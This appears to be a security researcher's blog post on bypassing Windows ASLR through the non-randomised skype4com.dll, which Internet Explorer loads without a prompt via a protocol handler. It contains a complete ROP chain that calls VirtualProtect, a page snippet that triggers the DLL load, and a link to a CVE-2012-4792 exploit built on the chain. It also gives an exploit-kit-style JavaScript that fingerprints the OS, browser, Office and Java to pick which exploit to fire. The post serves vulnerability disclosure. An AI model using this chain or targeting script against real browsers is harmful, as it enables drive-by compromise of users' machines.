Bypassing Windows ASLR using “skype4COM” protocol handler

While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out.

A quick test to see if it indeed loads up can be done from the code below

<SCRIPT language="JavaScript">  
location.href = 'skype4com:'
</SCRIPT>

Filename - Skype4COM.dll
Path     - C:\Program Files\Common Files\Skype\
MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7
Size     - 2,156,192 bytes
Signed   - 03 November 2011 11:46:40
Version  - 1.0.38.0

and here is my rop chain without any nulls.

 0x28025062   # POP EBX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x28024f71   # POP EAX # RETN
 0x5ec03420   # 0x5EC03420
 0x28027b5c   # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)
 0x28024f71   # POP EAX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x280b4654   # ADD EAX,5EC0325F # RETN
 0x28099a83   # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)
 0x41414141   # Compensate
 0x28017271   # POP ECX # RETN
 0x280de198   # VirtualProtect() pointer [IAT]
 0x28027b5b   # MOV EAX,DWORD PTR DS:[ECX] # RETN
 0x28041824   # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08
 0x2806405a   # POP EBP # RETN
 0x41414141   # Compensate
 0x41414141   # Compensate
 0x280bc55b   # & push esp # ret 
 0x28017271   # POP ECX # RETN
 0x28126717   # &Writable location
 0x28098730   # POP EDI # RETN
 0x28098731   # RETN (ROP NOP)
 0x28024f71   # POP EAX # RETN
 0x90909090   # nop
 0x28043527   # PUSHAD # RETN

I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911

Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP 🙂

On something off topic, I was looking at the html code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure).

For Office 2010 it installs 4 OpenDocuments ActiveX objects

SharePoint.OpenDocuments.4
SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

and Office 2007 only 3

SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4” then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share.

<HTML>
<SCRIPT language="JavaScript"> 
//
//
if (CheckIEOSVersion() == "ie8w7")
{
   if (CheckOfficeVersion() == "Office2010")
   {
//     Exploit call here
   }
   else if (CheckOfficeVersion() == "Office2007")
   {
//     Exploit call here
   }
   else if (JavaVersion() == "Java6")
   {
//     Exploit call here
   }
   else if (SkypeCheck() == "")
   {
//     Exploit call here
   }
}
//
//
function CheckIEOSVersion()
{
   var agent = navigator.userAgent.toUpperCase();
   var os_ie_ver = "";
//
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) 
      os_ie_ver = "ie7wxp";  
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1))
      os_ie_ver = "ie8wxp";
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1))
      os_ie_ver = "ie7wv";   
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8wv";
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8w7";   
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) 
      os_ie_ver = "ie9w7";
   if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) 
      os_ie_ver = "ie10w8"; 
   return os_ie_ver;
}
//
//
function CheckOfficeVersion()
{
   var offver = "";
   var checka = 0;
   var checkb = 0;
//
   try {
         checka = new ActiveXObject("SharePoint.OpenDocuments.4");  
   } catch (e) {}
   try {
         checkb = new ActiveXObject("SharePoint.OpenDocuments.3");  
   } catch (e) {}
//
   if ((typeof checka) == "object" && (typeof checkb) == "object")
     offver = "Office2010";
   else if ((typeof checka) == "number" && (typeof checkb) == "object") 
     offver = "Office2007";
//
   return offver;
}
//
//
function JavaVersion() 
{
   var javver = "";
   var javaa = 0;
//
   try {
         javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0");  
   } catch (e) {}
//
   if ((typeof javaa) == "object")
       javver = "Java6";
//
   return javver;
}
//
//
function SkypeCheck()
{
   var skypever = "";
   return skypever;
}
//
//
</SCRIPT>
</HTML> 

2 comments

  1. Well its not really a vulnerability in Skype, its just the developer didnt compile with the dynamicbase switch to randomize the addresses.

Leave a Reply

Your email address will not be published. Required fields are marked *